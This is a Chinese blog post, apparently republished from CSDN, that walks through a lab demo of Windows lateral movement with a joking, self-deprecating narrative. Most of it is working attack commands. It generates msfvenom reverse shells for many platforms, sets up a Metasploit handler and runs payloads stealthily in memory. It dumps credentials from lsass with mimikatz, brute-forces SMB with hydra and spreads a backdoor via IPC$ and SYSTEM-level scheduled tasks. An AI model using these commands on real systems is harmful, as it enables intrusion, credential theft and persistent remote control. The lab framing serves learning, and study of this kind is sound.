标签:遐想 shell 技巧 -- 横向 192.168 exe msfvenom payload
前言:
最近有一点点忙,快过年了,最近也接触到了我入行以来的第一次红队项目,虽然最后还是拉稀了,但是看到大家都没啥成果,我的心顿时舒服了不少......
这次的学习让我认识到了自己的不足,也让我明白了还是要继续学习,这一次的红队项目大家都没能成功进行内网漫游,但是我和他们不一样,在他们还在猛攻web的时候我已经开始提权了,当他们还在想怎么找其他的资产的时候我已经开始横向了,好吧,我承认这都是我凭空想象的,我称之为----“遐想流-最强无用之终极奥义之漏洞扫描专家”
经过我不断地想象,在我连续换了三个枕头和睡姿之后,我终于成功的漫游了,没错,在睡梦中我漫游了,从我家床上漫游到了我家的地板上......
好啦,首先我们进入到今天的正题,这是一次十分基础的文章,仅供小白参考,大佬勿扰
此次运用到的技术总结如下:
1. msfvenom 生成马子
2. msfconsole 监听、上马以及一些小技巧
3. mimikatz的获取hash密码的两种方式
4. hydra进行协议口令爆破
5. 创建IPC$
6. 创建计划任务
生成监听马子
-p, --payload <payload> 指定需要使用的payload(攻击荷载)。
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch <architecture> 指定payload的目标架构,这里x86是32位,x64是64位 -platform <platform> 指定payload的目标平台
-s, --space <length> 设定有效攻击荷载的最大长度
-b, --bad-chars <list> 设定规避字符集
-i, --iterations <count> 指定payload的编码次数
-c, --add-code <path> 指定一个附加的win32 shellcode文件
-x, --template <path> 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行 --payload-options 列举payload的标准选项
-o, --out <path> 保存payload
-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项 --help-formats 查看msf支持的输出格式列表
这里举出一些利用msfvenom生成shell的命令:
Linux:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
Python:
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
此次实验的是,一台kali虚拟机,三台windows虚拟机环境,假装自己通过kali虚拟机拿下了其中一台windows虚拟机而后进行简单的横向演示,纯新手演示,大佬勿喷
我这里使用的是:
msfvenom -p windows/meterpreter_reverse_tcp LHOST=监听地址 LPORT=监听端口 -f exe -o xiaokui1.exe -x xiaokui.exe
这条命令是生成一个马子,监听地址为本机地址,-f 指定类型,-x 指定捆绑文件 -o 保存的文件名
接下来进入msfconsole进入监听模式
msfconsole
msfconsole 进入
use exploit/multi/handler 固定格式
set payload windows/meterpreter/reverse_tcp固定格式
set lhost 192.168.43.213 本机ip
set lport 4444 监听端口
Exploit 攻击
将马子传入值 192.168.43.144 windows主机后运行即可上马,假装自己是通过漏洞传上去的(狗头狗头)
上马之后进入到我们的后渗透阶段,因为meterpreter与系统命令还是有一丢丢小区别的,相信大家也看到了,直接执行系统命令是不行的
常见的可以直接执行的操作系统文件命令如下:
1. 查看文件内容
cat 文件目录\文件名
2. 删除指定的文件:
del 文件目录\文件名
3. 上传文件到目标机主上,
upload 攻击者文件目录/文件名 受害者文件目录\
4. 下载文件到本机上:
download 文件目录\文件名 /root/Desktop/
5. 编辑文件:
edit c:\boot.ini
6. 列出在当前目录中的文件列表
ls/dir
7. 进入目录文件下
cd c:\\
8. 删除文件
rm file
9. 在受害者系统上的创建目录
mkdir dier
10. 受害者系统上删除目录
rmdir
11. 修改目标主机上的文件名
mv
14. 用户登录数
enumdesktops
执行此命令可进入cmd交互,实际上直接输入shell也可以
execute -H -i -f cmd.exe
execute 命令如下
-H 创建隐藏在视图之外的流程。
-a <opt>传递给命令的参数。
-c 通道化I/O(交互所需)。
-d <opt>使用-m时要启动的“虚拟”可执行文件。
-f <opt>要运行的可执行命令。
-h 帮助菜单。
-i 创建流程后,我会与流程进行交互。
-k 在MeterMeters当前桌面上执行进程
-m 从内存中执行。
-s <opt>以会话用户的身份在给定会话中执行进程
-t 使用当前模拟的线程令牌执行进程
骚姿势来了,由于直接执行的马子容易被察觉,所以可以进行隐秘性极好的远程加载,马子不直接传入受害机,且进程名字可以进行隐藏
execute -H -m -d notepad.exe -f /root/xiaokui2.exe -a "-o xiaokui2.txt"
虽然失败了,但是可能是环境问题
使用mimikatz获取明文密码
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords
其实米米卡兹获取密码有两个方式,一个是在线读取,一个是离线读取,在线读取需要将米米卡兹上传至目标主机内,这样的话当然会被杀毒软件给杀了,所以需要进行免杀操作,我当然不会免杀了,所以推荐大家使用第二种方式,离线读取。
我先讲解在线获取哈,这里由于还不知道密码,所以不能直接登录到目标主机上,由于新建用户会留下很多日志后期不好清理,所以这里直接使用meterpreter进行读取
成功获取明文密码,别问我为啥是123456,因为太复杂怕不是解不开
使用米米卡兹进行离线读取
进入目标主机的任务管理器,找到 lsass.dmp文件,单击右键,进行创建转储文件
使用米米卡兹读取lsass.dmp文件
sekurlsa::minidump C:\Users\Administrator\AppData\Local\Temp\lsass.DMP
如果看到 Seitch to MINIDUMP 说明加载成功,而后直接执行
输入
sekurlsa::logonPasswords full
密码获取完毕
本来想来个横向演示的,后来想起来其他的虚机密码都不是弱口令,改起来还不想改,就不拿他们演示了,就假装这台受害机是另一台内网内目标好啦
Hydra密码爆破
首先当然是先nmap查看一下端口状态
不难发现此时开放了139/445端口
可以利用hydra进行协议smb爆破,命令如下
hydra -l administrator -P /usr/share/nmap/nselib/data/passwords.lst smb://192.168.43.144
IPC的建立
net use \\192.168.43.144\ipc$ "123456" /user:administrator
kali的net use建立管道的命令由于系统的差异性,所以此时使用另一台windows虚机进行操作
查看当前连接
net use
查看目标机C盘目录
dir \\192.168.43.157\c$
查看目标机进程
tasklist /S 192.168.43.144 /U administrator /P 123456
将小马子复制进目标机
copy J:\xiaokui1.exe \\192.168.43.144\C$
创建计划任务
这里我分享两种创建方式
方式一:
使用at方式创建计划任务
查看目标机当前时间,这一步是为了设置计划任务执行时间,因为有些主机时间与我们真实机是有差异的
net time \\192.168.43.144
创建at计划任务
at \192.168.43.144 9 13:31:00 C:\xiaokui1.exe Added a new job with job ID = 100
这就没办法了,命令是没问题的,但是在我这个虚机里at被弃用了,可恶啊,那么直接进行方案2
方式二:
schtasks命令
schtasks /create /s 192.168.43.144 /u administrator /p 123456 /ru "SYSTEM" /tn test /sc DAILY /tr c:\xiaokui1.exe /F
创建计划任务,/s 指定远程机器名或 ip 地址,/ru 指定运行任务的用户权限,这里指定
为最高的 SYSTEM,/tn 是任务名称,/sc 是任务运行频率,这里指定为每天运行,并没什么
实际意义,/tr 指定运行的文件,/F 表示如果指定的任务已经存在,则强制创建任务并抑制
立即执行计划任务
schtasks /run /s 192.168.43.144 /u administrator /p 123456 /tn test /i
可以看到,肉鸡上线了
需要说的是,其实创建schtasks命令不需要使用用户名密码,因为创建ipc$已经简历成功,不过一般情况下我还是喜欢使用的
删除计划任务命令如下:
schtasks /delete /s 192.168.43.144 /tn "test" /f
删除ipc$命令如下:
net use \\192.168.43.144\ips$ /del
最后在我的幻想下,我直接用弱口令打穿了内网,然后拿出了我用了十年的内核溢出提权马将所有的权限都提升到了root和system权限,又删除了日志留下了后门和不落地马子之后,潇洒的提交了报告。
我成功的得到了公司和客户的高度认可,并赠予我2022年度最佳做梦小能手的称号,同时提名为中国梦之幻想队称号,也没什么可说的,我相信大家只要多多吃花生喝啤酒,再去拼夕夕买个枕头,也一定有机会做一个这么牛逼的梦的,好了,今天做梦结束了,承让了各位
标签:遐想,shell,技巧,--,横向,192.168,exe,msfvenom,payload 来源: https://blog.csdn.net/weixin_48421613/article/details/122727662
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。